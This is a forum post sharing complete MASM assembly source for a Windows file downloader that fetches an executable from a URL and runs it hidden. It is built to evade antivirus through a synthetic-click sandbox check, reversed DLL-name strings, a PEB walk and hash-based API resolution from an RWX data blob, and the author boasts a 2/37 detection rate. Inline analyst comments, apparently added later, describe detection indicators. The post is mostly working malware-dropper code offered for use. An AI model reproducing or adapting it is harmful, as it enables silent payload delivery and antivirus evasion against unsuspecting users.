
ASM [MASM] File Downloader

Just my implementation of a file downloader. I had a little go at bypassing anti-viruses, but I believe that shouldn't be the main thing people want, etc. I share most of my source code so that people can learn, not so they can get FUD shit, etc. I got the StrReverse procedure out of the MASM macros lib that comes with MASM, just in case someone doesn't have these files. The rest is fully written by me. At the moment it compiles to 2,560 bytes; it could be made smaller, but that would mean messing with the section alignment, etc.

Code:
>.386
.model flat,stdcall
option casemap:none

include \masm32\include\windows.inc
include \masm32\include\masm32.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\masm32.lib

LASTINPUTINFO struct                   ; local mirror of the Win32 LASTINPUTINFO passed to GetLastInputInfo
   cbSize DWORD ?                      ; must hold SizeOf LASTINPUTINFO before the call (set at start:)
   dwTime DWORD ?                      ; tick count of the most recent user input, written by GetLastInputInfo
LASTINPUTINFO ends

.data

; 118 raw machine-code bytes kept in the writable .data section. start: later
; calls VirtualProtect on exactly this 118-byte range (PAGE_EXECUTE_READWRITE)
; and then CALLs into it through dwLoadAPI with EDX = a module base and
; EBX = a 32-bit constant, reading the result from EAX -- presumably a
; hash-based export-address resolver (verify by disassembling the bytes; they
; are not decoded here). Analyst note: an RWX re-protection of a .data range
; followed by an indirect CALL into it is the behavioural indicator to key on.
szLoadAPI db 055h, 08Bh, 0ECh, 083h, 0C4h, 0F4h, 052h, 089h, 055h, 0FCh, 08Bh, 04Ah, 03Ch, 003h, 0CAh, 089h, 04Dh, 0F4h, 08Bh, 049h 
         db 078h, 003h, 0CAh, 089h, 04Dh, 0F8h, 08Bh, 051h, 018h, 08Bh, 049h, 020h, 003h, 04Dh, 0FCh, 033h, 0FFh, 08Bh, 031h, 003h 
         db 075h, 0FCh, 033h, 0C0h, 051h, 0ACh, 08Bh, 0C8h, 003h, 0F8h, 0D3h, 0C7h, 085h, 0C0h, 075h, 0F5h, 059h, 03Bh, 0FBh, 074h 
         db 010h, 083h, 0C1h, 004h, 04Ah, 075h, 0E0h, 0BAh, 0C2h, 058h, 062h, 01Bh, 05Ah, 033h, 0C0h, 0C9h, 0C3h, 08Bh, 045h, 0FCh 
         db 08Bh, 04Dh, 0F8h, 08Bh, 059h, 018h, 08Bh, 049h, 024h, 003h, 0C8h, 02Bh, 0DAh, 0D1h, 0E3h, 003h, 0CBh, 00Fh, 0B7h, 019h 
         db 08Bh, 04Dh, 0F8h, 08Bh, 049h, 01Ch, 003h, 0C8h, 0C1h, 0E3h, 002h, 003h, 0CBh, 003h, 001h, 05Ah, 0C9h, 0C3h 

   szURL                   db 'http://example.com/file.exe', 0      ; download source as posted (example.com placeholder)
   szFileName              db 'deadlyvermilion.exe', 0              ; local path: target of the download and argument of the execute call

   szURLMon                db 'lld.noMLRU', 0       ; 'URLMon.dll' stored reversed; StrReverse restores it at runtime
   szShell32               db 'lld.23llehS', 0      ; 'Shell32.dll' stored reversed; same string-hiding trick

   dwLoadAPI               DWORD ?     ; address of szLoadAPI, used as an indirect CALL target

   dwLoadLibraryA          DWORD ?     ; filled from the resolver (EBX = 0A216A185h) using the PEB-derived module base
   dwURLMon                DWORD ?     ; HMODULE returned by LoadLibraryA(szURLMon)
   dwShell32               DWORD ?     ; HMODULE returned by LoadLibraryA(szShell32)
   dwURLDownloadToFileA    DWORD ?     ; filled from the resolver (EBX = 0B2040657h) using dwURLMon
   dwShellExecuteA         DWORD ?     ; filled from the resolver (EBX = 0D9A88A30h) using dwShell32

   FirstInput      LASTINPUTINFO <>    ; last-input snapshot taken before the synthetic click
   SecondInput     LASTINPUTINFO <>    ; last-input snapshot taken after it
   
   
.code

;-----------------------------------------------------------------------
; void StrReverse(char *lpString)
; In-place reversal of a NUL-terminated string (taken from the MASM32
; macro library, per the post). Used here to restore the reversed DLL
; names in .data before they are handed to LoadLibraryA.
; ABI:    stdcall, one DWORD argument
; In:     lpString = address of a writable, NUL-terminated buffer
; Out:    nothing; the buffer is modified in place
; Clobb:  EAX, EDX, CL/CH (low half of ECX), flags
; Note:   EDX is advanced once before the first byte is tested, so a
;         zero-length string is scanned past its own terminator.
; Note:   the swap loop ends on `jl`, a signed compare of two pointers;
;         `jb` is the unsigned form. Harmless for user-mode addresses
;         below 2 GB, which is all this 32-bit build ever sees.
;-----------------------------------------------------------------------
StrReverse proc lpString:LPSTR
mov eax,lpString                       ; eax = head pointer
mov edx,eax                            ; edx = tail pointer, starts at head
@@:                                    ; advance edx until it sits on the NUL
add edx,1
cmp byte ptr [edx],0
jne @B
sub edx,1                              ; back up to the last non-NUL byte
@@:
mov cl,byte ptr [eax]          ; cl = *head, ch = *tail
mov ch,byte ptr [edx]
mov [eax],ch                   ; store them crosswise: swap in place
mov [edx],cl
add eax,1                      ; walk the two pointers toward each other
sub edx,1
cmp eax,edx
jl @B                          ; loop while head < tail (signed compare, see header note)
ret
StrReverse endp

;********************************************************************************

; Entry point. Flow: (1) synthetic-input environment check, (2) make the byte
; blob in .data executable, (3) resolve LoadLibraryA / URLDownloadToFileA /
; ShellExecuteA at runtime so none of them appears in the import table,
; (4) download szURL to szFileName and run it. Analyst notes are inline.
; EBX is overwritten below; that is tolerated only because this is the
; process entry point and nothing above it expects EBX preserved.
start:

   ; --- (1) Synthetic-input check -------------------------------------------
   ; Take a last-input snapshot, sleep 5 s, inject one left click through
   ; mouse_event, snapshot again. If the two dwTime values differ by less
   ; than 4500 ms the program exits without doing anything -- presumably to
   ; bail out where Sleep is shortened or the injected click is not reflected
   ; by GetLastInputInfo. Analyst note: mouse_event + GetLastInputInfo in a
   ; binary with no UI of its own is a self-contained environment probe and
   ; a reasonable behavioural rule on its own.
   MOV FirstInput.cbSize, SizeOf LASTINPUTINFO
   MOV SecondInput.cbSize, SizeOf LASTINPUTINFO

   Invoke GetLastInputInfo, ADDR FirstInput
   Invoke Sleep, 5000
   Invoke mouse_event, MOUSEEVENTF_LEFTDOWN, 0, 0, 0, 0
   Invoke mouse_event, MOUSEEVENTF_LEFTUP, 0, 0, 0, 0
   Invoke GetLastInputInfo, ADDR SecondInput

   MOV EAX, SecondInput.dwTime
   SUB EAX, FirstInput.dwTime           ; EAX = tick delta between the two snapshots
   CMP EAX, 4500
   JL ExitMain                          ; signed compare: a wrapped (negative) delta also exits

   ; --- (2) Make the data blob executable -----------------------------------
   ; Re-protects the 118-byte szLoadAPI range to RWX. lpflOldProtect is passed
   ; as 0 and the return value is never checked; if the protection change does
   ; not take effect, the CALL into the blob below faults.

   Invoke VirtualProtect, ADDR szLoadAPI, 118, PAGE_EXECUTE_READWRITE, 0

   ; --- (3) Import-free API resolution --------------------------------------
   ; Restore the DLL names from their reversed spellings in .data.
   Invoke StrReverse, ADDR szURLMon
   Invoke StrReverse, ADDR szShell32

   LEA EAX, szLoadAPI
   MOV dwLoadAPI, EAX                   ; indirect CALL target = the RWX data blob

   ; Walk the Process Environment Block instead of calling GetModuleHandle:
   ; FS:[30h] is the PEB on 32-bit Windows; +0Ch is PEB->Ldr; +0Ch in Ldr is
   ; the InLoadOrderModuleList head; two Flink hops move past the first two
   ; list entries; +18h of the entry reached is its DllBase. The author relies
   ; on that third entry being kernel32 (its base is fed to the resolver and
   ; the result is stored as dwLoadLibraryA). Analyst note: an FS:[30h] read
   ; followed by fixed-offset list walking is a well-known static signature.
   ASSUME FS:NOTHING
   MOV EAX, FS:[30h]                    ; PEB
   MOV EAX, [EAX+0Ch]                   ; PEB->Ldr
   MOV EAX, [EAX+0Ch]                   ; Ldr->InLoadOrderModuleList.Flink (1st entry)
   MOV EAX, [EAX]                       ; 2nd entry
   MOV EAX, [EAX]                       ; 3rd entry
   MOV EAX, [EAX+18h]                   ; entry->DllBase

   MOV EDX, EAX                         ; EDX = module base handed to the resolver
   MOV EBX, 0A216A185h                  ; EBX = 32-bit constant, presumably a hash of the wanted export name
   CALL dwLoadAPI                       ; run the blob; EAX = resolved address
   MOV dwLoadLibraryA, EAX

   PUSH OFFSET szURLMon                 ; LoadLibraryA("URLMon.dll") via the address still in EAX
   CALL EAX
   MOV dwURLMon, EAX

   PUSH OFFSET szShell32                ; LoadLibraryA("Shell32.dll")
   CALL dwLoadLibraryA
   MOV dwShell32, EAX

   MOV EDX, dwURLMon                    ; resolve one export of URLMon by constant
   MOV EBX, 0B2040657h
   CALL dwLoadAPI
   MOV dwURLDownloadToFileA, EAX

   MOV EDX, dwShell32                   ; resolve one export of Shell32 by constant
   MOV EBX, 0D9A88A30h
   CALL dwLoadAPI
   MOV dwShellExecuteA, EAX

   ; --- (4) Download and execute --------------------------------------------
   ; URLDownloadToFileA(NULL, szURL, szFileName, 0, NULL); stdcall, arguments
   ; pushed right-to-left. The HRESULT left in EAX is not checked.
   PUSH 0                               ; lpfnCB
   PUSH 0                               ; dwReserved
   PUSH OFFSET szFileName               ; szFileName
   PUSH OFFSET szURL                    ; szURL
   PUSH 0                               ; pCaller
   CALL dwURLDownloadToFileA

   ; ShellExecuteA(NULL, NULL, szFileName, NULL, NULL, 0); nShowCmd = 0 is
   ; SW_HIDE, so the downloaded file is launched without a visible window.
   ; The return value is not checked. Analyst note: download-to-path followed
   ; by ShellExecute on the same path, with both APIs resolved at runtime, is
   ; the behavioural core worth alerting on.
   PUSH 0                               ; nShowCmd = 0 (SW_HIDE)
   PUSH 0                               ; lpDirectory
   PUSH 0                               ; lpParameters
   PUSH OFFSET szFileName               ; lpFile
   PUSH 0                               ; lpOperation (NULL = default verb)
   PUSH 0                               ; hwnd
   CALL dwShellExecuteA                 ; EAX from here is what RET below hands back
   
ExitMain:
   RET                                  ; returning from the entry point ends the program
end start
But since I know at least one of you will ask what the detection rate is: it's currently (2/37).



by DeadlyVermilion

 